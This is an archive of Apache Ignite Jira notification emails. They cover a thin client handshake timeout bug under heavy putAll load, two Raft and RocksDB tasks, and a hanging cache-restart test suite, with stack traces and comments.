[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem.

*{color:#ff}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

On the attached metrics screenshot shows the behaviour of the test in details:

 

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at org.apache.ignite.Ignition.startClient(Ignition.java:615) ~[classes/:?]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.getClient(ThinClientDataGenerationApplication.java:181)
 ~[ignite-ducktests-2.
14.0-SNAPSHOT.jar:2.14.0-SNAPSHOT]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.call(ThinClientDataGenerationApplication.java:138)
 

[jira] [Updated] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Attachment: test_one_greedy_thin_client.png

> Timeout while thin client connection
> 
>
> Key: IGNITE-16843
> URL: https://issues.apache.org/jira/browse/IGNITE-16843
> Project: Ignite
>  Issue Type: Bug
>Reporter: Sergey Korotkov
>Priority: Minor
> Attachments: test_one_greedy_thin_client.png
>
>
> In usecases with several active thin clients producing noticable load to 
> cluster new thin clients can fail to connect with the 
> *"ClientConnectionException: Channel is closed"* error in the 
> *TcpClientChannel::handshake()* method.
> On server side warning *"Unable to perform handshake within timeout 
> [timeout=1"* is logged.
> The problem can be easily reproduced by several large putAlls invoked in 
> parallel from several or single thin client.  Espesially for the 
> TRANSACTIONAL caches.  But ATOMIC caches are also affected - the only 
> difference is that for ATOMIC caches more parallelizm factor and larger 
> batches for putAlls are needed.
> 
> The reason of the problem is a fact that a single queue is used in the ignite 
> node to serve all thin client related requests (queue in the 
> {_}GridThinClientExecutor{_}). Both working requests like _putAll_ and 
> control ones like _handshake_ which are used for connection establishment. 
> Working requests can live indefenitely in a queue (or at least longer then 
> {_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
> the ignite node to check if a _handshake_ request is processed in a timely 
> manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By 
> default the 10 seconds timeout is used 
> ({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires 
> the client session is closed forcibly.
> So, if one or several thin clients fill queue with long operations new 
> clients can not connect. 
> 
> The real usecase reveals the problem is as follows.
>  * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
>  * One TRANSACTIONAL cache with backups=1
>  * About 30Gb of data on each node
>  * Several (upto 70-100 at the same time) thin clients loading data using 
> putAlls in 5 records batches. Client connects, loads 3 batches and 
> disconnects (spark jobs in fact).
>  * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
> ClientConnectorConfiguration
> 
> Two ducktests were created to reproduce and isolate  the problem.
> *{color:#ff}Note that asserts in testcases done in a way that test PASS 
> means that problem IS reproduced.{color}*  Tests check that at least one thin 
> client fails with the "Channel is closed" error and that server node log 
> contains warning about the handshake timeout.
> *ThinClientConcurrencyTest::test_many_thin_clients*
> Mimics the above real life usecase. Several thin client processes invoke 
> putAlls in several threads. There are two sets of parameters - one for 
> TRANSACTIONAL and one for ATOMIC cache.
> *ThinClientConcurrencyTest::test_one_greedy_thin_client*
> Minimal test shows that a single thin client can produce such a load that 
> another one can not connect.
> On the attached metrics screenshot shows the behaviour of the test in details:
>  
> ***
> The following full stack trace is logged on the client side:
> {noformat}
> org.apache.ignite.client.ClientConnectionException: Channel is closed
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
>  ~[classes/:?]
> at 
> 

[jira] [Created] (IGNITE-16843) Timeout while thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)
Sergey Korotkov created IGNITE-16843:


 Summary: Timeout while thin client connection
 Key: IGNITE-16843
 URL: https://issues.apache.org/jira/browse/IGNITE-16843
 Project: Ignite
  Issue Type: Bug
Reporter: Sergey Korotkov


In usecases with several active thin clients producing noticable load to 
cluster new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On server side warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several or single thin client.  Espesially for the TRANSACTIONAL 
caches.  But ATOMIC caches are also affected - the only difference is that for 
ATOMIC caches more parallelizm factor and larger batches for putAlls are needed.

The reason of the problem is a fact that a single queue is used in the ignite 
node to serve all thin client related requests (queue in the 
{_}GridThinClientExecutor{_}). Both working requests like _putAll_ and control 
ones like _handshake_ which are used for connection establishment. 

Working requests can live indefenitely in a queue (or at least longer then 
{_}handshake{_}).  On the other hand a special watchdog timer is scheduled in 
the ignite node to check if a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By default 
the 10 seconds timeout is used 
({_}ClientConnectorConfiguration::handshakeTimeout{_}). If timeout expires the 
client session is closed forcibly.

So, if one or several thin clients fill queue with long operations new clients 
can not connect. 

The real usecase reveals the problem is as follows.
 * 4 nodes cluster, 64 cpu, 32Gb heap, 512Gb off-heap  each
 * One TRANSACTIONAL cache with backups=1
 * About 30Gb of data on each node
 * Several (upto 70-100 at the same time) thin clients loading data using 
putAlls in 5 records batches. Client connects, loads 3 batches and 
disconnects (spark jobs in fact).
 * Default handshakeTimeout (10 secs) and threadPoolSize(8) in 
ClientConnectorConfiguration


Two ducktests were created to reproduce and isolate  the problem.

*{color:#FF}Note that asserts in testcases done in a way that test PASS 
means that problem IS reproduced.{color}*  Tests check that at least one thin 
client fails with the "Channel is closed" error and that server node log 
contains warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the above real life usecase. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters - one for 
TRANSACTIONAL and one for ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

Minimal test shows that a single thin client can produce such a load that 
another one can not connect.

***

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.start(TcpIgniteClient.java:339)
 ~[classes/:?]
at org.apache.ignite.Ignition.startClient(Ignition.java:615) ~[classes/:?]
at 
org.apache.ignite.internal.ducktest.tests.thin_client_test.ThinClientDataGenerationApplication$PutJob.getClient(ThinClientDataGenerationApplication.java:181)
 ~[ignite-ducktests-2.
14.0-SNAPSHOT.jar:2.14.0-SNAPSHOT]
at 

[jira] [Created] (IGNITE-16842) Remove topology listeners if Raft leadership is lost

2022-04-13 Thread Aleksandr Polovtcev (Jira)
Aleksandr Polovtcev created IGNITE-16842:


 Summary: Remove topology listeners if Raft leadership is lost
 Key: IGNITE-16842
 URL: https://issues.apache.org/jira/browse/IGNITE-16842
 Project: Ignite
  Issue Type: Task
Reporter: Aleksandr Polovtcev


When a CMG leader is elected it registers a Topology Listener to propagate the 
Cluster State. After the leadership is lost, this Listener should be 
de-registered so that old leaders will stop propagating the Cluster State along 
with the newly elected leader.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16841) Use common RocksDB instance in Raft Storage

2022-04-13 Thread Aleksandr Polovtcev (Jira)
Aleksandr Polovtcev created IGNITE-16841:


 Summary: Use common RocksDB instance in Raft Storage
 Key: IGNITE-16841
 URL: https://issues.apache.org/jira/browse/IGNITE-16841
 Project: Ignite
  Issue Type: Task
Reporter: Aleksandr Polovtcev
Assignee: Aleksandr Polovtcev


RocksDbRaft storage uses its own underlying RocksDB instance. It should be 
replaced with a common RocksDB instance for better resources utilization and 
performance. 



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Comment Edited] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Pavel Pereslegin (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521530#comment-17521530
 ] 

Pavel Pereslegin edited comment on IGNITE-16805 at 4/13/22 8:08 AM:


The suite was run on TC 200+ times with no hangs.

The fix only includes changes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.


was (Author: xtern):
The suite was run on TC 200+ times with no hangs.

The patch only includes fixes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 40m
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> 

[jira] [Comment Edited] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Pavel Pereslegin (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521530#comment-17521530
 ] 

Pavel Pereslegin edited comment on IGNITE-16805 at 4/13/22 8:07 AM:


The suite was run on TC 200+ times with no hangs.

The patch only includes fixes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.


was (Author: xtern):
The suite was run on TC 200+ times with no hangs.

The fix only includes fixes to prevent hanging when the node stops. The 
optimistic tx test still sometimes fails and this should be investigated 
separately.

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 40m
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> 

[jira] [Commented] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Pavel Pereslegin (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521527#comment-17521527
 ] 

Pavel Pereslegin commented on IGNITE-16805:
---

[~NSAmelchev],
thanks for the help and review.

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 40m
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1563)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1550)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1542)
>   at 
> org.apache.ignite.internal.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:856)
>   at 
> 

[jira] [Commented] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Ignite TC Bot (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17521524#comment-17521524
 ] 

Ignite TC Bot commented on IGNITE-16805:


{panel:title=Branch: [pull/9945/head] Base: [master] : No blockers 
found!|borderStyle=dashed|borderColor=#ccc|titleBGColor=#D6F7C1}{panel}
{panel:title=Branch: [pull/9945/head] Base: [master] : No new tests 
found!|borderStyle=dashed|borderColor=#ccc|titleBGColor=#F7D6C1}{panel}
[TeamCity *-- Run :: All* 
Results|https://ci.ignite.apache.org/viewLog.html?buildId=6522281buildTypeId=IgniteTests24Java8_RunAll]

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 0.5h
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
